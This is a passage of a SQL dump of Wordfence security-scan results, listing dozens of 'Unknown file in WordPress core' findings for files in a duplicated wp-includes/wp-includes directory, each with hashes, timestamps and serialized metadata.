href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-block-parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33757,1631564679,1631564679,'new','knownfile',75,'4857d6d22db5da4f85db2310cdea4e73','5cd8df20639b43ec92f1a34123bbb510','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33758,1631564679,1631564679,'new','knownfile',75,'63b4fdc561efbc182162fe8e2b020aab','7144703c890fd4c618e9f4e23180c591','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-patterns-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-block-patterns-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33759,1631564679,1631564679,'new','knownfile',75,'ade974a0a2103f178a12ef0a654048e4','b0aa9aed7abbeda7ea5edf74c8d90788','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-styles-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-block-styles-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33760,1631564679,1631564679,'new','knownfile',75,'16ed280bccc089646b4a4f6c198c0970','f8fc843391244be220571df84d75f481','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-supports.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-block-supports.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33761,1631564679,1631564679,'new','knownfile',75,'9c6facbb93c52f153044d18bef362cb1','ea24885244c80276daff4fc01d490e2e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-block-type-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33762,1631564680,1631564680,'new','knownfile',75,'0c6107804b14cca9822b46ad36b4634a','3b2cf90046407269d9b6f8cfcb51c435','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33763,1631564680,1631564680,'new','knownfile',75,'bd92a448e9404a9397d668d648aa7357','427354ac098e637a83f05a7f703bfa34','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-block.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33764,1631564680,1631564680,'new','knownfile',75,'1c50c5939344b30338ffa100a1340f28','a9787116e569d78a697c4fa35a57be9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-comment-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33765,1631564680,1631564680,'new','knownfile',75,'f1be47743efe763230feb8fb24d89578','96bd68c4225b9e6db05cc4536c71381d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33766,1631564680,1631564680,'new','knownfile',75,'978c04844b2990d21e9a400ef63d0a0e','2b54342d192304c492f461ccc788ff26','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33767,1631564680,1631564680,'new','knownfile',75,'7874856bba1f7bdad0f7f86ee68f7776','af66a295159e2423772f9db7da5b7e13','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-manager.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-manager.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33768,1631564680,1631564680,'new','knownfile',75,'2eda7305fa7f7fb50c594d00ba29750c','7a23e83c13c40fa1a0d82e699b27162d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-nav-menus.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-customize-nav-menus.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33769,1631564680,1631564680,'new','knownfile',75,'a3add13a7db6f378a66ff76b7d122fdf','c68b0f65511508eaa726d2bad5262039','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-customize-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33770,1631564680,1631564680,'new','knownfile',75,'061b96cdbbde410198bb2cbd13b63efd','c39d3a9cf4f752cbb10632e63640f062','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33771,1631564680,1631564680,'new','knownfile',75,'d49e46fd12a0d78f679326b6e0668b15','5126d47178bb6189211ddac19f898205','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33772,1631564680,1631564680,'new','knownfile',75,'aab4dcd5dd041c7af4e24951ea7430db','b51152a67f77fa5958a8c0e8bddd10fd','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33773,1631564680,1631564680,'new','knownfile',75,'db5f38cbc1f2c2e2c40da422fce72526','4c4965aafc20c71bf88136dd4349b589','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-date-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-date-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33774,1631564680,1631564680,'new','knownfile',75,'bec8fd7c6aae72a3aa35ad587eaf002e','bbf363e9f0b25bdb36d333bd3e7b8af1','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-dependency.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-dependency.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33775,1631564680,1631564680,'new','knownfile',75,'2b206fbdf7ff7823b95252b729bd2ebf','f35e0ef82702c264989ba8c18478651e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33776,1631564680,1631564680,'new','knownfile',75,'41e71671882c9581af1399d1ed8dd860','eb3e06397f43378e6b0e430bbf989723','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33777,1631564680,1631564680,'new','knownfile',75,'3d48380350d884d197234943fd3c3ee5','3443b8e777c11396ddd743efe9a41d29','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-error.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-error.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33778,1631564680,1631564680,'new','knownfile',75,'73dfaac430e5389ce19aa21cb3ccc093','3c89c647a7f536ad867b4580f3214688','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-fatal-error-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-fatal-error-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33779,1631564680,1631564680,'new','knownfile',75,'cb32ba686922aead28570c444f509d22','3825911a7c003cbd17b11d3b80a85126','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache-transient.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-feed-cache-transient.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33780,1631564680,1631564680,'new','knownfile',75,'a1482eb6d851c7c84a341a8d4a34b32e','7a6993fe2df1c8272226db50027b579f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-feed-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33781,1631564680,1631564680,'new','knownfile',75,'cb0d0db76feb51c8f392f503984e279d','d0763a0fa41399a5eda927724b2b7cb2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-hook.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-hook.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33782,1631564680,1631564680,'new','knownfile',75,'1df4138e7c197bdd2ceb2d992b88fbe7','d434dca383433b046f767b2b4065834e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-cookie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-wp-http-cookie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33783,1631564680,1631564680,'new','knownfile',75,'1bd9cd30a2c749dbe3faf4147e24c41e','8692d85d37d340fcd61b86362d7e29eb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-curl.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-http-curl.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33784,1631564680,1631564680,'new','knownfile',75,'0d6eaa773ad70bbde25df574d17be7dd','5ae357a55508dd40bbfc9090cfc73df2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-encoding.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-encoding.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33785,1631564680,1631564680,'new','knownfile',75,'7d60a1fbe2939696666c55f9a63aede1','6802085a76a4e14cf802ebdad03d4610','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-ixr-client.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-http-ixr-client.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33786,1631564680,1631564680,'new','knownfile',75,'358d3bb8d33493e2edcb23f1869bfbaf','c3b20955ed3c325ba6aa28585e0a9f8c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-proxy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-http-proxy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33787,1631564680,1631564680,'new','knownfile',75,'9d8ee498ebd29ab404626597124d0d19','5498d0fba84822b59a2b21a9970f82b6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-hooks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-http-requests-hooks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33788,1631564680,1631564680,'new','knownfile',75,'8bd773b75276d4189831ce0335ee3468','50c856ac6abc78569acc27cffdfbbba2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/class-wp-http-requests-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33789,1631564680,1631564680,'new','knownfile',75,'e10e578616afea32bbdc6962b3cf7d22','bb920d039626bb400e693a0c42af6944','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33790,1631564680,1631564680,'new','knownfile',75,'b9f717440af28d6ff812df42a65f5993','ea84453fca5aefc70e1bab45bb41dc79','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-http-streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33791,1631564680,1631564680,'new','knownfile',75,'df6f77369f69cb13d7cfc63791433c70','41e6e5afcd7dcf6406102fee571b954a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-gd.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-image-editor-gd.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33792,1631564680,1631564680,'new','knownfile',75,'44fb3d39038be6d416fdac2b5a4e425d','442574d7d0e4b389611c71a61a6d5ec6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-imagick.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-image-editor-imagick.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33793,1631564680,1631564680,'new','knownfile',75,'a2aefa53a9c092b8622cbe4327956df8','ed6e8cb6283c9088d90ea9e2c11af901','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-image-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33794,1631564681,1631564681,'new','knownfile',75,'7ec8959fc438630ed6a7a3707b75c9a8','308a93c32c2cc14d795e3c05f9c19e7b','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-list-util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-list-util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33795,1631564681,1631564681,'new','knownfile',75,'b177d186faa1cd1a769fc76cc06451d9','05d7b9d140b77257170163e20176e757','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale-switcher.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-locale-switcher.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33796,1631564681,1631564681,'new','knownfile',75,'cfde21f414e2ffb424511455234d3987','359979f50d346e43ee57fdee473b7fee','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 